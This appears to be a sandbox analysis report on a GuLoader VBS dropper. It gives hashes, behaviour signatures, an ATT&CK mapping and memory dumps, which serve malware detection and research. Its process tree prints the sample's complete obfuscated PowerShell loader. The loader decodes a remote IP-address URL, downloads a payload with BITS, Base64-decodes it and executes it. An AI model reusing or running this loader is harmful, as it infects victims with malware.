Overview

overview

10

Static

static

1

2ba636d017...b4.vbs

windows7-x64

8

2ba636d017...b4.vbs

windows10-2004-x64

10

a3855846b5...de.vbs

windows7-x64

8

a3855846b5...de.vbs

windows10-2004-x64

10

b8652df6cc...65.vbs

windows7-x64

10

b8652df6cc...65.vbs

windows10-2004-x64

10

fb7b4de6fe...45.vbs

windows7-x64

10

fb7b4de6fe...45.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    137s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
  • submitted
    19-07-2023 07:25

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fb7b4de6fe1e517caccbdde9450c7c42d5ba1a42e0a5e5c14e362aeb6ad67745.vbs

  • Size

    5KB

  • MD5

    98c31b202cc3fd8c47b61f085dd4ebfc

  • SHA1

    c678fb695edcb72af3d82f52f1b8292f17398a2e

  • SHA256

    fb7b4de6fe1e517caccbdde9450c7c42d5ba1a42e0a5e5c14e362aeb6ad67745

  • SHA512

    70a0022efaaf7cbbfa3bf4da057a301b8455a844b25510db7db77690fe714d6a7de210647444792a6eee5b53a731b35558eca0077b56f81a5b97bde19c0ba13e

  • SSDEEP

    96:uthC/xE7YcYmAcQ03Lo4PMX0GFf66OticvLmC4EdR4Z8Y:OhC/3NmAcQ03Lo4kX0GFfZOtVL3I8Y

Score
10/10
guloaderdownloaderpersistence

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Checks QEMU agent file 2 TTPs 2 IoCs

    Checks presence of QEMU agent, possibly to detect virtualization.

  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fb7b4de6fe1e517caccbdde9450c7c42d5ba1a42e0a5e5c14e362aeb6ad67745.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1212
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Potteringd1979 ([String]$Skovturene){$Kanukaoops=$Skovturene.toCharArray();For($Fashesuna=5; $Fashesuna -lt $Kanukaoops.count-1; $Fashesuna+=(5+1)){$Elec+=$Kanukaoops[$Fashesuna]};$Elec;}$Vinyletbr=Potteringd1979 'ImperhChuddtDisjatBudgepMessi:Disda/ Vejt/Lskbe9 shay1 Over. Klas2Palle4Inche4Color.Epith1quart9Gokar7Amber.Duode9Mahua/ Multn PolieBredywSeizow Cred/Acadee Opint FouehFrakko TobelUnder. farap unbesStavkpDrivv ';$Elec01=Potteringd1979 'Kaos i Clave SpinxTagry ';$Frstegang = Potteringd1979 ' Akti\Tooths GracySnyltsCodasw JereoGevalwScaw 6Unibr4 Vand\BankdWindvniFrittn IndidVenino PeriwPerensFeltsPpuddeo ThrewKerubePortir RatiSMartahFaktue MarilFestflBesta\Brachvelast1Woolg. Gdni0 tabe\KristpSildeoUnrefw Andee ProgrAlkalsSjagghsvrmeeStkyslstolelsacro.Ambite styrx RockeMasse ';.($Elec01) (Potteringd1979 'Behan$ TearOMarkeo UndenSlutdaAnonyb Slan2Preoc= Spis$MademeunwhinNdrinvTiger:Underw SgefiunrevnGrenadDanseiGemitrSkaer ') ;.($Elec01) (Potteringd1979 'Kuwai$ UdlgFMalpar CentsPrinct Telae DimegVauntaUdpakn Voldg Bran= Nidk$MrtelOCameoo Beden sideaLavpab Skod2 Smut+Oblig$PrcisFFotografflisDecimt SaldeAncylgrelucaPartnn DirtgErken ') ;.($Elec01) (Potteringd1979 ' Dwin$ VariEMigratGigabv DuckrBarreeSjles Letti=Hamme Rema( Pyrr(Olmerg tretwBoligmHaspei Indi farvw VogniStabinTeena3Adels2Grobi_ AfaspImpolrAntheo mudacOverpeIllits ForusDiape Reini- OrnaFManor SammPMiljrrSeparo Tonnc OvereUafvesAgates ZoosI Pacod Anal=hexam$Folke{ UnutPOdelsIHvlspDVinci} Apri)balus.FormaCluggeo ModemInitimProteaIndskn MaitdLjernLKontaiFalsin SkjoeEskap)Asson Demil-FlailsOverqpgallul FriviNapeatRudd Tonic[Etikec DecahDraabaConnerSlots]Enkel3Polyt4 Buti ');.($Elec01) (Potteringd1979 ' Neti$ UnbuIKalden Okket Miste AmphrFortyeFlirtsRetfasBagen Palk=Roban Unst$AsbesE FleltGuldkvApprarMidweeAitis[ Hals$Zink E Lesbt Bestv Carlr SteneAstea.Liniec aurooVideouGuldkn VrketCoali- Face2 Para]Sydve ');.($Elec01) (Potteringd1979 ' Drif$RepreDPandoi SupiaFritik SpejoSkulpn Engei BemrkAppleoFacio=ammia(MenurTEelspeEkvils dekltBlipp- kineP Straa prestInnovh Mous Sempe$ MundFCramprAnaths ErintHymnseCaligg ThyraMccafn Taugg Duod)Skruk Sundh-LaiseAObrotn TurkdSerra Neeb(Inhab[InterI TallnLookatjenkoP VivitPrecir Tide]Camer:Coxof:MailesConvoi Fletz CadmeGasun douz-DebareGtedeq Skri Sall8Laryn)Nosta ') ;if ($Diakoniko) {.$Frstegang $Interess;} else {;$Elec00=Potteringd1979 ' BelaS VacutKvaliaGluter camptStenc- LuftB FootiCommetHffdis overT Korar braca Unden StarsUnthifskribeRens r Eyeg Bulwa- CoevS Doppo MuseuEnalyrPestec Effleprevo Unbo$UnretVSammeiSplennApyreyIodatlRivieeFlagetDramab Tromr Medd Unip-VestmDBlokieStrugsbadevt KlagiPhellnLinjea TewstAasasi FurmoIraqinWater Amer$pellmO Mispo Preon KrmmaUopslb Blas2Recur ';.($Elec01) (Potteringd1979 'Detai$claviOBrydeo Rawnn PredaAdipibSlutm2reest=Forty$KraureBrawnn blaavPlade: Ordua DevapTossmp Unmed Pyroa Reflt antiaRuffe ') ;.($Elec01) (Potteringd1979 'SyzygIhousemVejmap DeseointerrCarpetTaraf-AmyelMLevitoHunandFrsteufractlInsane Proe thortBTellui GisptRotars DrumTForharRespaaTurdan TilbsAmforfOropheForver Rigs ') ;$Oonab2=$Oonab2+'\Startsi.bou';while (-not $Bldgrels) {.($Elec01) (Potteringd1979 'Zooth$ValetB afpllOpiumd NollgBookkrVidere Overl Attis Scal= Bipi(royetT Votee Brnes Foret Mang- lumiPWateraaftentPostmh Kimc Pseud$ RulsO Sproo petrn PrjuaFrequbForst2Lifeb)Hazer ') ;.($Elec01) $Elec00;.($Elec01) (Potteringd1979 'WeirdS carbt SagoaUfiksrMillitMatte-TarsoSCryoclDgndreTangfeBestrpAscom Ostr5Chili ');}.($Elec01) (Potteringd1979 ' Treg$ UdskP RaakoDannetTaxavtHustoeSensarFloneiUncomnPlanig sansd Hose1Besti9 Nuta7 Semi Mopl=Tubis uddybG ivereLemurtSamsa-FractC Vrtpo MlkenPaleotFlavieAvet nSurfltMian Forl$GiskeO SporoBuknin Camoa ForrbPleom2 Macr ');.($Elec01) (Potteringd1979 ' Supe$AstraSBakkaePlanel Fogev Reat Skaa=Ireos pay [ PebeSPremoy Misis krestFastbeImprim Garn. StraCTrngsoColeonImmeav SouteLithor nedktFulde]Killj:Turma:SepulF OsterSnerro Omgnm chriBCanceawoodis TrsteSerge6Usigt4BusynS Vivit ErklrRicheiArbutnKultugBauhi( Bili$OphidPUnoldo CotttMumiftBeshee PresrLegali Supen Akiag GoosdPlast1Natur9Aands7Bross) Rigs ');.($Elec01) (Potteringd1979 'Forar$DoterEBlouslAfskrechertcUdmal2Unpaw Drogi=Futur Abiot[LastnSatelyyAfsoesSplejtpiloseAfgham Plum. OpstTNotate Mindxaskebt Pera. CallEprogrn CostcIdolioJacald KryoiJensknEmbalg Marl]Sgerk:Eksam:resusA eksaS SheyCTouchISamtiIGavfl. SubcGEmulgeFlesht VehiS SisytMoerkr Bacti Yearn CrisgOvers(Tddel$ StryS HekhePluralAlphov Vene)Exurb ');.($Elec01) (Potteringd1979 'Klatr$UnawaBKviddlrefero Intec elaekRegeri Ulnos NutihHarmol Assa=halsr$DruknE defilCovile RetocUdfrs2 Euro. glams Sjusu Unrab Citas velutFurorrNewfaiThrean Helig Hste(Frikt2 Pres0Sycop3 Nonw7 Forn0Hausf5Menzi, Ramp2Disul5 Unde8Efter5 Slkn5Udrug) Flle ');.($Elec01) $Blockishl;}"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1996
      • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Potteringd1979 ([String]$Skovturene){$Kanukaoops=$Skovturene.toCharArray();For($Fashesuna=5; $Fashesuna -lt $Kanukaoops.count-1; $Fashesuna+=(5+1)){$Elec+=$Kanukaoops[$Fashesuna]};$Elec;}$Vinyletbr=Potteringd1979 'ImperhChuddtDisjatBudgepMessi:Disda/ Vejt/Lskbe9 shay1 Over. Klas2Palle4Inche4Color.Epith1quart9Gokar7Amber.Duode9Mahua/ Multn PolieBredywSeizow Cred/Acadee Opint FouehFrakko TobelUnder. farap unbesStavkpDrivv ';$Elec01=Potteringd1979 'Kaos i Clave SpinxTagry ';$Frstegang = Potteringd1979 ' Akti\Tooths GracySnyltsCodasw JereoGevalwScaw 6Unibr4 Vand\BankdWindvniFrittn IndidVenino PeriwPerensFeltsPpuddeo ThrewKerubePortir RatiSMartahFaktue MarilFestflBesta\Brachvelast1Woolg. Gdni0 tabe\KristpSildeoUnrefw Andee ProgrAlkalsSjagghsvrmeeStkyslstolelsacro.Ambite styrx RockeMasse ';.($Elec01) (Potteringd1979 'Behan$ TearOMarkeo UndenSlutdaAnonyb Slan2Preoc= Spis$MademeunwhinNdrinvTiger:Underw SgefiunrevnGrenadDanseiGemitrSkaer ') ;.($Elec01) (Potteringd1979 'Kuwai$ UdlgFMalpar CentsPrinct Telae DimegVauntaUdpakn Voldg Bran= Nidk$MrtelOCameoo Beden sideaLavpab Skod2 Smut+Oblig$PrcisFFotografflisDecimt SaldeAncylgrelucaPartnn DirtgErken ') ;.($Elec01) (Potteringd1979 ' Dwin$ VariEMigratGigabv DuckrBarreeSjles Letti=Hamme Rema( Pyrr(Olmerg tretwBoligmHaspei Indi farvw VogniStabinTeena3Adels2Grobi_ AfaspImpolrAntheo mudacOverpeIllits ForusDiape Reini- OrnaFManor SammPMiljrrSeparo Tonnc OvereUafvesAgates ZoosI Pacod Anal=hexam$Folke{ UnutPOdelsIHvlspDVinci} Apri)balus.FormaCluggeo ModemInitimProteaIndskn MaitdLjernLKontaiFalsin SkjoeEskap)Asson Demil-FlailsOverqpgallul FriviNapeatRudd Tonic[Etikec DecahDraabaConnerSlots]Enkel3Polyt4 Buti ');.($Elec01) (Potteringd1979 ' Neti$ UnbuIKalden Okket Miste AmphrFortyeFlirtsRetfasBagen Palk=Roban Unst$AsbesE FleltGuldkvApprarMidweeAitis[ Hals$Zink E Lesbt Bestv Carlr SteneAstea.Liniec aurooVideouGuldkn VrketCoali- Face2 Para]Sydve ');.($Elec01) (Potteringd1979 ' Drif$RepreDPandoi SupiaFritik SpejoSkulpn Engei BemrkAppleoFacio=ammia(MenurTEelspeEkvils dekltBlipp- kineP Straa prestInnovh Mous Sempe$ MundFCramprAnaths ErintHymnseCaligg ThyraMccafn Taugg Duod)Skruk Sundh-LaiseAObrotn TurkdSerra Neeb(Inhab[InterI TallnLookatjenkoP VivitPrecir Tide]Camer:Coxof:MailesConvoi Fletz CadmeGasun douz-DebareGtedeq Skri Sall8Laryn)Nosta ') ;if ($Diakoniko) {.$Frstegang $Interess;} else {;$Elec00=Potteringd1979 ' BelaS VacutKvaliaGluter camptStenc- LuftB FootiCommetHffdis overT Korar braca Unden StarsUnthifskribeRens r Eyeg Bulwa- CoevS Doppo MuseuEnalyrPestec Effleprevo Unbo$UnretVSammeiSplennApyreyIodatlRivieeFlagetDramab Tromr Medd Unip-VestmDBlokieStrugsbadevt KlagiPhellnLinjea TewstAasasi FurmoIraqinWater Amer$pellmO Mispo Preon KrmmaUopslb Blas2Recur ';.($Elec01) (Potteringd1979 'Detai$claviOBrydeo Rawnn PredaAdipibSlutm2reest=Forty$KraureBrawnn blaavPlade: Ordua DevapTossmp Unmed Pyroa Reflt antiaRuffe ') ;.($Elec01) (Potteringd1979 'SyzygIhousemVejmap DeseointerrCarpetTaraf-AmyelMLevitoHunandFrsteufractlInsane Proe thortBTellui GisptRotars DrumTForharRespaaTurdan TilbsAmforfOropheForver Rigs ') ;$Oonab2=$Oonab2+'\Startsi.bou';while (-not $Bldgrels) {.($Elec01) (Potteringd1979 'Zooth$ValetB afpllOpiumd NollgBookkrVidere Overl Attis Scal= Bipi(royetT Votee Brnes Foret Mang- lumiPWateraaftentPostmh Kimc Pseud$ RulsO Sproo petrn PrjuaFrequbForst2Lifeb)Hazer ') ;.($Elec01) $Elec00;.($Elec01) (Potteringd1979 'WeirdS carbt SagoaUfiksrMillitMatte-TarsoSCryoclDgndreTangfeBestrpAscom Ostr5Chili ');}.($Elec01) (Potteringd1979 ' Treg$ UdskP RaakoDannetTaxavtHustoeSensarFloneiUncomnPlanig sansd Hose1Besti9 Nuta7 Semi Mopl=Tubis uddybG ivereLemurtSamsa-FractC Vrtpo MlkenPaleotFlavieAvet nSurfltMian Forl$GiskeO SporoBuknin Camoa ForrbPleom2 Macr ');.($Elec01) (Potteringd1979 ' Supe$AstraSBakkaePlanel Fogev Reat Skaa=Ireos pay [ PebeSPremoy Misis krestFastbeImprim Garn. StraCTrngsoColeonImmeav SouteLithor nedktFulde]Killj:Turma:SepulF OsterSnerro Omgnm chriBCanceawoodis TrsteSerge6Usigt4BusynS Vivit ErklrRicheiArbutnKultugBauhi( Bili$OphidPUnoldo CotttMumiftBeshee PresrLegali Supen Akiag GoosdPlast1Natur9Aands7Bross) Rigs ');.($Elec01) (Potteringd1979 'Forar$DoterEBlouslAfskrechertcUdmal2Unpaw Drogi=Futur Abiot[LastnSatelyyAfsoesSplejtpiloseAfgham Plum. OpstTNotate Mindxaskebt Pera. CallEprogrn CostcIdolioJacald KryoiJensknEmbalg Marl]Sgerk:Eksam:resusA eksaS SheyCTouchISamtiIGavfl. SubcGEmulgeFlesht VehiS SisytMoerkr Bacti Yearn CrisgOvers(Tddel$ StryS HekhePluralAlphov Vene)Exurb ');.($Elec01) (Potteringd1979 'Klatr$UnawaBKviddlrefero Intec elaekRegeri Ulnos NutihHarmol Assa=halsr$DruknE defilCovile RetocUdfrs2 Euro. glams Sjusu Unrab Citas velutFurorrNewfaiThrean Helig Hste(Frikt2 Pres0Sycop3 Nonw7 Forn0Hausf5Menzi, Ramp2Disul5 Unde8Efter5 Slkn5Udrug) Flle ');.($Elec01) $Blockishl;}"
        3⤵
        • Checks QEMU agent file
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2824
        • C:\Program Files (x86)\internet explorer\ielowutil.exe
          "C:\Program Files (x86)\internet explorer\ielowutil.exe"
          4⤵
          • Checks QEMU agent file
          • Adds Run key to start application
          • Suspicious use of NtCreateThreadExHideFromDebugger
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetWindowsHookEx
          PID:2780

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1
T1060

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\logwes.dat
    Filesize

    184B

    MD5

    c719a2da0277d848ac5a7dece9f81a88

    SHA1

    f29deed45e03f12503e37cd7a87f13f7ac1f8457

    SHA256

    19b30cae3fcf84d09171a113ce92342ea67b60ac4c43ca24da6c47bf55c81295

    SHA512

    3ad1a3052333ff058a65cd0e3db73377452178b256d59f50a59809bfceb398a905ddc016f344fc014028022dc8b1ad21e2ebfee3748c74a897eea7deb875683b

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    7b9c22d19fc506cd8d9fdc05c6eebcc2

    SHA1

    9e87141594325201dfdcefd8e1228e072781204b

    SHA256

    816ef4c187bc2510af7bb3efff293a38c381883e010791ebce58c13377f4ff7f

    SHA512

    82b4cb66ac368a81bd70d0982c29c92b64a2198871673cc3e1e5676af267a0eab5f86bb95d848560588f1077a88ce223ede29d69c7d57eef78b7f5db2f5d20a4

    Download Submit
  • memory/1996-65-0x00000000024B0000-0x0000000002530000-memory.dmp
    Filesize

    512KB

    Download
  • memory/1996-72-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp
    Filesize

    9.6MB

    Download
  • memory/1996-61-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp
    Filesize

    9.6MB

    Download
  • memory/1996-62-0x00000000024B0000-0x0000000002530000-memory.dmp
    Filesize

    512KB

    Download
  • memory/1996-64-0x00000000024B0000-0x0000000002530000-memory.dmp
    Filesize

    512KB

    Download
  • memory/1996-63-0x00000000024B0000-0x0000000002530000-memory.dmp
    Filesize

    512KB

    Download
  • memory/1996-58-0x000000001B150000-0x000000001B432000-memory.dmp
    Filesize

    2.9MB

    Download
  • memory/1996-60-0x00000000024A0000-0x00000000024A8000-memory.dmp
    Filesize

    32KB

    Download
  • memory/1996-73-0x00000000024B0000-0x0000000002530000-memory.dmp
    Filesize

    512KB

    Download
  • memory/1996-74-0x00000000024B0000-0x0000000002530000-memory.dmp
    Filesize

    512KB

    Download
  • memory/1996-75-0x00000000024B0000-0x0000000002530000-memory.dmp
    Filesize

    512KB

    Download
  • memory/1996-83-0x00000000024B0000-0x0000000002530000-memory.dmp
    Filesize

    512KB

    Download
  • memory/1996-59-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp
    Filesize

    9.6MB

    Download
  • memory/1996-125-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp
    Filesize

    9.6MB

    Download
  • memory/2780-102-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2780-111-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2780-139-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2780-137-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2780-136-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2780-135-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2780-134-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2780-133-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2780-132-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2780-93-0x0000000000DC0000-0x0000000004A1D000-memory.dmp
    Filesize

    60.4MB

    Download
  • memory/2780-94-0x0000000077110000-0x00000000772B9000-memory.dmp
    Filesize

    1.7MB

    Download
  • memory/2780-95-0x0000000000DC0000-0x0000000004A1D000-memory.dmp
    Filesize

    60.4MB

    Download
  • memory/2780-96-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2780-97-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2780-98-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2780-99-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2780-100-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2780-101-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2780-131-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2780-103-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2780-104-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2780-105-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2780-106-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2780-107-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2780-109-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2780-130-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2780-112-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2780-113-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2780-114-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2780-115-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2780-116-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2780-117-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2780-118-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2780-119-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2780-110-0x0000000000DC0000-0x0000000004A1D000-memory.dmp
    Filesize

    60.4MB

    Download
  • memory/2780-129-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2780-128-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2780-122-0x0000000077110000-0x00000000772B9000-memory.dmp
    Filesize

    1.7MB

    Download
  • memory/2780-127-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/2824-91-0x0000000077110000-0x00000000772B9000-memory.dmp
    Filesize

    1.7MB

    Download
  • memory/2824-121-0x0000000073150000-0x00000000736FB000-memory.dmp
    Filesize

    5.7MB

    Download
  • memory/2824-120-0x0000000002720000-0x0000000002760000-memory.dmp
    Filesize

    256KB

    Download
  • memory/2824-71-0x0000000002720000-0x0000000002760000-memory.dmp
    Filesize

    256KB

    Download
  • memory/2824-69-0x0000000073150000-0x00000000736FB000-memory.dmp
    Filesize

    5.7MB

    Download
  • memory/2824-92-0x0000000077300000-0x00000000773D6000-memory.dmp
    Filesize

    856KB

    Download
  • memory/2824-70-0x0000000002720000-0x0000000002760000-memory.dmp
    Filesize

    256KB

    Download
  • memory/2824-88-0x0000000006530000-0x000000000A18D000-memory.dmp
    Filesize

    60.4MB

    Download
  • memory/2824-87-0x0000000005180000-0x0000000005181000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2824-86-0x0000000002720000-0x0000000002760000-memory.dmp
    Filesize

    256KB

    Download
  • memory/2824-85-0x0000000073150000-0x00000000736FB000-memory.dmp
    Filesize

    5.7MB

    Download
  • memory/2824-84-0x0000000073150000-0x00000000736FB000-memory.dmp
    Filesize

    5.7MB

    Download
  • memory/2824-68-0x0000000073150000-0x00000000736FB000-memory.dmp
    Filesize

    5.7MB

    Download